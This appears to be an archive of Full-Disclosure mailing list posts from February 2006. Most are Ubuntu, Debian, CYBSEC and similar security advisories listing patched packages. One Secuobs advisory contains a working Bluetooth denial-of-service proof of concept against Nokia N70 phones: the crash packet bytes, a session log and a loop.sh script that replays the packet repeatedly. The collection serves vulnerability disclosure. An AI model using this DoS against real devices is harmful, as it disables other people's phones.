[Full-disclosure] [USN-248-1] unzip vulnerability
=== Ubuntu Security Notice USN-248-1 February 13, 2006 unzip vulnerability CVE-2005-4667 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: unzip The problem can be corrected by upgrading the affected package to version 5.51-2ubuntu0.3 (for Ubuntu 4.10), 5.51-2ubuntu1.3 (for Ubuntu 5.04), or 5.52-3ubuntu2.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A buffer overflow was discovered in the handling of file name arguments. By tricking a user or automated system into processing a specially crafted, excessively long file name with unzip, an attacker could exploit this to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu0.3.diff.gz Size/MD5: 6433 bd8da93f936f5ac234e5327c59bf8758 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu0.3.dsc Size/MD5: 534 db487b07f655377436bc72be8431351a http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51.orig.tar.gz Size/MD5: 1112594 8a25712aac642430d87d21491f7c6bd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu0.3_amd64.deb Size/MD5: 148742 3af9fe5de336b8a59b19d2eadb892888 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu0.3_i386.deb Size/MD5: 135516 c334934daf9a7e49f064ef17e884f106 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu0.3_powerpc.deb Size/MD5: 149480 d5d41b65e3da33976e137bd22a85e2e5 Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu1.3.diff.gz Size/MD5: 7253 443470aef5d23f7290151222116fa81d http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu1.3.dsc Size/MD5: 534 2618e86f3a4d42382c0add1ae2f978f5 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51.orig.tar.gz Size/MD5: 1112594 8a25712aac642430d87d21491f7c6bd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu1.3_amd64.deb Size/MD5: 148844 b30b12cd03aa4cedcc0ab83d387e2466 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu1.3_i386.deb Size/MD5: 136232 72feb619b0290ba9056cf24f9b467ec0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.51-2ubuntu1.3_powerpc.deb Size/MD5: 150924 3985b6ad992bd5a4dfd9aef941d83d8b Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-3ubuntu2.1.diff.gz Size/MD5: 9670 76fa4142b93fd08f8fa4861533846d90 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-3ubuntu2.1.dsc Size/MD5: 534 4afc9cba0b40ff5fcb5eef8442ac7da2 http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz Size/MD5: 1140291 9d2391d6eac9217d1f41472034a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-3ubuntu2.1_amd64.deb Size/MD5: 160486 6619e42ad67d9e53a50a93cb33073829 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-3ubuntu2.1_i386.deb Size/MD5: 147208 58a818487eb9b617a3e8f278246528b7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-3ubuntu2.1_powerpc.deb Size/MD5: 161976 d71ed8a8078bbf56bd87d16564fc5197 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-249-1] xpdf/poppler/kpdf vulnerabilities
=== Ubuntu Security Notice USN-249-1 February 13, 2006 xpdf, poppler, kdegraphics vulnerabilities CVE-2006-0301 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: kpdf libpoppler0c2 xpdf-reader xpdf-utils The problem can be corrected by upgrading the affected package to the following versions: Ubuntu 4.10: xpdf: 3.00-8ubuntu1.11 Ubuntu 5.04: xpdf: 3.00-11ubuntu3.7 kpdf: 4:3.4.0-0ubuntu3.4 Ubuntu 5.10: libpoppler0c2: 0.4.2-0ubuntu6.6 kpdf: 4:3.4.3-0ubuntu2.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The splash image handler in xpdf did not check the validity of coordinates. By tricking a user into opening a specially crafted PDF file, an attacker could exploit this to trigger a buffer overflow which could lead to arbitrary code execution with the privileges of the user. The poppler library and kpdf also contain xpdf code, and thus are affected by the same vulnerability. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.11.diff.gz Size/MD5:51306 7f91af74652b69e09c8ae2538b72c024 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.11.dsc Size/MD5: 790 0ffc05f1485f4efccf940814617cd504 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00.orig.tar.gz Size/MD5: 534697 95294cef3031dd68e65f331e8750b2c2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-common_3.00-8ubuntu1.11_all.deb Size/MD5:57000 ca9fe2062163cdd79a2370495c50aea3 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.11_all.deb Size/MD5: 1286 4a29b2bba83192ac16cbc4c2bad35628 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.11_amd64.deb Size/MD5: 668158 3a703c515c0c876035f0d05e2be22003 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.11_amd64.deb Size/MD5: 1274356 9d3a6c38a3f65f556c425c41a05bc705 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.11_i386.deb Size/MD5: 633132 56ea07e9c91fa8e49c061e7d6cf8a832 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.11_i386.deb Size/MD5: 1196608 9b2ab28decf80d6dcf56b65b03881546 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.11_powerpc.deb Size/MD5: 694516 aa44a41b84a89a6e9d0ddc6750f43b1f http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.11_powerpc.deb Size/MD5: 1314108 63b83fdf49a5617259441aaf6e3a49fb Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_3.4.0-0ubuntu3.4.diff.gz Size/MD5: 159142 ed4ce74e621f81392e0c3a64480671ab http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_3.4.0-0ubuntu3.4.dsc Size/MD5: 1373 21e227c71a04928390474093c896ebed http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_3.4.0.orig.tar.gz Size/MD5: 801 c60ab0a0d727701144b5342dcbee201a http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-11ubuntu3.7.diff.gz Size/MD5:52131 fa9f6d24b6eaf5dc17b2f99e630114f1 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-11ubuntu3.7.dsc Size/MD5: 798 42d96cb5ea9146f4fcbe1473cd04d92f http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00.orig.tar.gz Size/MD5: 534697 95294cef3031dd68e65f331e8750b2c2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_3.4.0-0ubuntu3.4_all.deb Size/MD5:11000 f79a86b8c3d634e06137948339b1e0f6 http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-common_3.00-11ubuntu3.7_all.deb Size/MD5:57252 ed4e43934e60c2eee40a4349fec34b7e http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-11ubuntu3.7_all.deb Size/MD5: 1282 ec50399db9e2c82aaacee38773a5a002 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kamera_3.4.0-0ubuntu3.4_amd64.deb Size/MD5:82662 acb87ca506232c3e0c65b24486f1b3f0 http://security.ubuntu.com/ubuntu/pool/universe/k/kdegraphics/kcoloredit_3.4.0-0ubuntu3.4_amd64.deb Size/MD5:94222 b51621e298345bdc7f63c02904830332
[Full-disclosure] [USN-250-1] Linux kernel vulnerability
=== Ubuntu Security Notice USN-250-1 February 13, 2006 linux-source-2.6.12 vulnerability CVE-2006-0454 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 (Breezy Badger) The following packages are affected: linux-image-2.6.12-10-386 linux-image-2.6.12-10-686 linux-image-2.6.12-10-686-smp linux-image-2.6.12-10-amd64-generic linux-image-2.6.12-10-amd64-k8 linux-image-2.6.12-10-amd64-k8-smp linux-image-2.6.12-10-amd64-xeon linux-image-2.6.12-10-iseries-smp linux-image-2.6.12-10-itanium linux-image-2.6.12-10-itanium-smp linux-image-2.6.12-10-k7 linux-image-2.6.12-10-k7-smp linux-image-2.6.12-10-mckinley linux-image-2.6.12-10-mckinley-smp linux-image-2.6.12-10-powerpc linux-image-2.6.12-10-powerpc-smp linux-image-2.6.12-10-powerpc64-smp linux-patch-ubuntu-2.6.12 The problem can be corrected by upgrading the affected package to version 2.6.12-10.28. You have to restart your computer after a standard system upgrade to effect the necessary changes. Details follow: Herbert Xu discovered a remote Denial of Service vulnerability in the ICMP packet handler. In some situations a memory allocation was released twice, which led to memory corruption. A remote attacker could exploit this to crash the machine. Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.28.diff.gz Size/MD5: 7927324 68d28cb754f6194fab6c8f360201b3ed http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.28.dsc Size/MD5: 3152 cf99588f2dc173e722a0dc2d0ed26346 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12.orig.tar.gz Size/MD5: 47177098 9272115d4005d4e9773a1a6170fd20cd Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-doc-2.6.12_2.6.12-10.28_all.deb Size/MD5: 4555660 c7091b4913c416db2fbeea1421cf0422 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.28_all.deb Size/MD5: 40446584 fccc02233420269b741fd6ff647de54a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-tree-2.6.12_2.6.12-10.28_all.deb Size/MD5: 376084 317f7634bd2408b81215c77c6752336c amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/acpi-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:20806 90e27f3fb3bd26afc2ecde46aa766372 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:45604 8e8dcb7af405b4435a1e980bbb6c9ede http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/crc-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5: 2314 d29c9dac0949afa0528e7702282d858c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext3-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:88708 3a76c91f4bf8e3252b2c48395efca3d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fat-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:35150 672342ac4121b99c49d5fe9fb19634ba http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fb-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:42360 21622b0ea0f05fe8abb561a92cd3494d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firewire-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:70526 06a2fc587fda7afe208f4ab8b2a9cd0d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firmware-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5: 5744 4be03e3db5aac867c3156e9f3b20cd74 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/floppy-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:34328 fe51f98b6851a3a074d496c3052ae292 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:53482 b3400cbf584e86313a2503b79ec684db http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5: 129628 31bbafa213f7ed1d2def8f57a56d4d31 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/input-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5:43836 aeec4fcc2013db2702d72f2e9de99653 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ipv6-modules-2.6.12-10-amd64-generic-di_2.6.12-10.28_amd64.udeb Size/MD5: 115024
[Full-disclosure] [ Secuobs - Advisory ] Another kind of DoS on Nokia cell phones
[Software affected] Bluetooth Stack on Nokia cell phones [Version] Nokia N70 and maybe other models [Impact] Remote Denial of Service, cellular phones begin to be slower and then freeze after a short period (within 30 seconds). [Credits] Pierre Betouin - [EMAIL PROTECTED] - Bug found with BSS new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux) BSS could be downloaded on http://www.secuobs.com/news/15022006-bss_0_8.shtml [Vendor] notified now [Original advisory] http://www.secuobs.com/news/15022006-nokia_n70.shtml#english http://www.secuobs.com/news/15022006-nokia_n70.shtml#french [Concept] L2CAP packets responsible of the crash are : 7D AF 00 00 41 41 41 Where: Code field 0x7D (1 byte) Ident field 0xAF (1 byte) Length field 0x (2 bytes) 0x41 bytes are random padding. [Proof of Concept] # l2ping -c 3 00:15:A0:XX:XX:XX Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ... 0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms 0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms 0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms 3 sent, 3 received, 0% loss # ./loop.sh 00:15:A0:XX:XX:XX (.. snip ..) # l2ping -c 1 00:15:A0:XX:XX:XX Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ... no response from 00:15:A0:XX:XX:XX id 0 1 sent, 0 received, 100% loss [replay_l2cap_packet_nokiaN70.c] could be downloaded on http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c [Loop.sh] as follows : #!/bin/bash # Another Nokia N70 Bluetooth remote Denial of Service # Pierre BETOUIN [EMAIL PROTECTED] # Feb 14 11:21:58 GMT+1 2006 echo Another Nokia N70 Bluetooth remote Denial of Service echo Pierre BETOUIN [EMAIL PROTECTED] echo if (( $# 1 )); then echo Usage: $0 (uses replay_l2cap_packet_nokiaN70) exit fi if [ -x ./replay_l2cap_packet_nokiaN70 ]; then echo Kill this prog with \killall -9 loop.sh\ in another terminal. echo PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now) echo read while (( 1 )); do # Infinite loop, a bit dirty, we must say ;) ./replay_l2cap_packet_nokiaN70 $1 done else echo You must compile replay_l2cap_packet_nokiaN70 before echo gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c exit fi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 974-1] New gpdf packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 974-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 15th, 2006 http://www.debian.org/security/faq - -- Package: gpdf Vulnerability : buffer overflows Problem type : local (remote) Debian-specific: no CVE ID : CVE-2006-0301 SuSE researchers discovered heap overflow errors in xpdf, the Portable Document Format (PDF) suite, which is also present in gpdf, the GNOME version of the Portable Document Format viewer, and which can allow attackers to cause a denial of service by crashing the application or possibly execute arbitrary code. The old stable distribution (woody) does not contain gpdf packages. For the stable distribution (sarge) these problems have been fixed in version 2.8.2-1.2sarge3. For the unstable distribution (sid) these problems will be fixed soon. We recommend that you upgrade your gpdf package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3.dsc Size/MD5 checksum: 1663 df225affa785bd87ec77fa638622fa22 http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3.diff.gz Size/MD5 checksum:35587 886283dbf45b0a52a56c568dfd01fc0c http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2.orig.tar.gz Size/MD5 checksum: 1245535 5ceb66aa95e51c4e1d6e10cb29560ff9 Alpha architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_alpha.deb Size/MD5 checksum: 867776 3eae015fd887821f5b5c3284c83a6741 AMD64 architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_amd64.deb Size/MD5 checksum: 795236 6e6723e743ac15016429832291cb1d3b ARM architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_arm.deb Size/MD5 checksum: 781166 ce6a73d615af8389b8d2576682db2ba3 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_i386.deb Size/MD5 checksum: 781604 446aeb1fd82d591ac979b5dda2f0e032 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_ia64.deb Size/MD5 checksum: 958004 ccc74856dcedb5d2e8c27598c9909546 HP Precision architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_hppa.deb Size/MD5 checksum: 859614 73db7d560fe856c33a7babb8ed9bd7ae Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_m68k.deb Size/MD5 checksum: 745580 b458793d535ed18877d9899f2b587ba9 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_mips.deb Size/MD5 checksum: 818348 68656069bf8340db8815494d65366336 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_mipsel.deb Size/MD5 checksum: 810998 896945fbcf39ab03adb5111251735f20 PowerPC architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_powerpc.deb Size/MD5 checksum: 799502 267b2b0bed065acf22a90231400157bc IBM S/390 architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_s390.deb Size/MD5 checksum: 775816 1d8a34abf13fd8493a0fe91ebc8e2844 Sun Sparc architecture: http://security.debian.org/pool/updates/main/g/gpdf/gpdf_2.8.2-1.2sarge3_sparc.deb Size/MD5 checksum: 763590 7f5b34c244d7a5c41075c116ecd9a135 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFD8vZhW5ql+IAeqTIRAm0CAJ0Ql701FZoCTNWI1rMT7fVFkRWWtACgjdNY 1MWDMH+g60qb8OkM0OaDA4A= =ESWs -END PGP
Re: [Full-disclosure] Tracking with etags
iirc very similar problem was made public several years ago and there was online demo. a solution may be to disable browser cache - stops at least the privacy problem between sessions. -- where do you want bill gates to go today? On Tue, Feb 14, 2006 at 08:23:35AM -0800, Adam Gleave wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 First, sorry if this has been mentioned before. I've searched and haven't found any mention, but it seems too obvious to have not already been reported. Basically, client gets etag from server, client sends etag to server next time it connects, server can associate client. Might not sound significant, but if Gmail - for instance - gives people Etag's, they - and anyone listening in on the connection - can associate unanonnimized accounts with anonymized accounts. I tested this on tor + privoxy and it worked. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.0 (OpenBSD) iQIVAwUBQ/IDmsLXg8DOh72JAQK94hAAhCS1r7b6R1xJa9QuGD2MNJLZbNPuZxbc 4d9R/5wV2Xa2/UDbGwjAoX2kZNsje9X+tLwIcprSp1sUavXnYZZZC2GJblvmc3j7 UDAVo3Ge44U4GFTP03l86DPWD18d6PmkYkrdUkOJfCiaGDSnhlsOjvywFUqOIvDq cLuDrKXYn2XCu1wEG5BUPVKQSRdIvyK4lsIEGUlUgVCsp5H0ComeVIOANcNUxwrW GGnvh7X+6lzbpLAsb89QME3I8+2CcHhGjkbGr47R/eBcjU1zGKObbVS+4McYgJaY VL5hNnTUgst4a+m3mm6dPSm+n/MDurnXVq+AvWOf0YA6yjZO+ve6vUQsfrfujN2d 3p+4xj5cNWS1AMpF9/0lcSFwOr43hfOG4xePbdyXOppMeSTMDGf2ApuPvpjn4jKg nGhDqq4Ho2DZDnoMYhYtdeW6dB7QGxluChmC0Mflnaar1EBJyUrqppPfDPPK8OLG /8ZVgJo3qR+ruKGpfzC7pKP43Q8gMRUWu6YuPg92SIojgd2mJXfR2zlRQkgZeg71 CO+use+wCeuFMw0ICA64dfwIJrl7EoAaNTTAaKgoy8Wiklh4y8jN3xclSPqv1QWv kKqTA5ZeTlzxZyM1lLHJ05ruBk1WUBQ7TKijEX67hrQrkBFPw3yB1clHbwLotVjV ls51uf4YtAM= =pvn0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kadu Remote Denial Of Service Fun
Hi all, Some little Kadu fun info: http://www.piotrbania.com/all/adv/kadu-fun.txt best regards, pb -- Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 - The more I learn about men, the more I love dogs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAP BC
(The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf ) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: Arbitrary File Read/Delete in SAP BC (Business Connector) Vulnerability Class: Improper Input Validation Release Date: 02/15/2006 Affected Applications: * SAP BC 4.6 * SAP BC 4.7 Affected Platforms: Platform-Independent Local / Remote: Remote Severity: Medium Author: Leandro Meiners. Vendor Status: Confirmed, patch released. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Product Overview: = SAP Business Connector (SAP BC) is a middleware application based on B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology. Vulnerability Description: == SAP BC was found to allow reading and deleting any file from the file system to which the user that the SAP BC is running as had access. The vulnerability is present in the Monitoring functionality of the SAP Adapter. Technical Details: == Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their clients to upgrade affected software prior to the technical knowledge been publicly available. Impact: === The Business Connector by default runs as a privileged user (administrator on the Windows platform and root on *NIX platforms), which allows ANY file on the File System to be read/deleted. According to the SAP Business Connector Security Best Practices, the following strategies are recommended for running the SAP BC in *NIX environments: 1. Running as non root user, using a high port. 2. Running as non root user, using a high port and port remapping to see the SAP BC in a restricted port. 3. Running the JVM setuid root. 4. Running SAP BC as root If either strategy (1) or (2) was taken the scope of the vulnerability was mitigated to allowing read/delete access to only the files owned by the user which the BC was running as. However, if (3) or (4) had been chosen ANY file on the File System could be read/deleted from the BC. Moreover, (3) allowed any user of the Operating System to obtain root since any Java program would be run with root privileges due to a SetUid Java Virtual Machine. The SAP Business Connector Security Best Practices has been corrected to recommend running the BC as a non-root user and using a high-numbered port or, if supported by the Operating System, giving the user privileges to open a specific port below 1024 to be used by the BC. Solutions: == SAP released a patch regarding this issue, for versions 4.6 and 4.7 of SAP BC. Details can be found in SAP note 906401. Vendor Response: * 12/06/2005: Initial Vendor Contact. * 12/07/2005: Technical details for the vulnerabilities sent to vendor. * 01/20/2006: Solution provided by vendor. * 02/15/2006: Coordinate release of pre-advisory without technical details. * 05/15/2006: Coordinate release of advisory with technical details. Contact Information: For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com. Please bear in mind that technical details will be disclosed three months after the release of this pre-advisory, so such questions won't be answered until then. For more information regarding CYBSEC: www.cybsec.com Leandro Meiners CYBSEC S.A. Security Systems E-mail: [EMAIL PROTECTED] Tel/Fax: [54-11] 4382-1600 Web: http://www.cybsec.com PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CYBSEC - Security Pre-Advisory: Phishing Vector in SAP BC
(The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Phishing_Vector_in_SAP_BC.pdf ) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: Phishing Vector in SAP BC (Business Connector) Vulnerability Class: Phishing Vector / Improper Input Validation Release Date: 02/15/2006 Affected Applications: * SAP BC Core Fix 7 (and below) Affected Platforms: Platform-Independent Local / Remote: Remote Severity: Low Author: Leandro Meiners. Vendor Status: Confirmed, patch released. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Product Overview: = SAP Business Connector (SAP BC) is a middleware application based on B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology. Vulnerability Description: == SAP BC was found to provide a vector to allow Phishing scams against the SAP BC administrator. Technical Details: == Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their clients to upgrade affected software prior to the technical knowledge been publicly available. Impact: === This can be used to mount a Phishing scam by sending a link, that if clicked by the administrator (while logged in, or logs in after clicking) will load the attacker's site webpage inside an HTML frame. Solutions: == SAP released a patch regarding this issue, which requires Server Core Fix 7. Details can be found in SAP note 908349. Vendor Response: * 12/06/2005: Initial Vendor Contact. * 12/07/2005: Technical details for the vulnerabilities sent to vendor. * 12/19/2005: Solutions provided by vendor. * 02/15/2006: Coordinate release of pre-advisory without technical details. * 05/15/2006: Coordinate release of advisory with technical details. Contact Information: For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com. Please bear in mind that technical details will be disclosed three months after the release of this pre-advisory, so such questions won't be answered until then. For more information regarding CYBSEC: www.cybsec.com Leandro Meiners CYBSEC S.A. Security Systems E-mail: [EMAIL PROTECTED] Tel/Fax: [54-11] 4382-1600 Web: http://www.cybsec.com 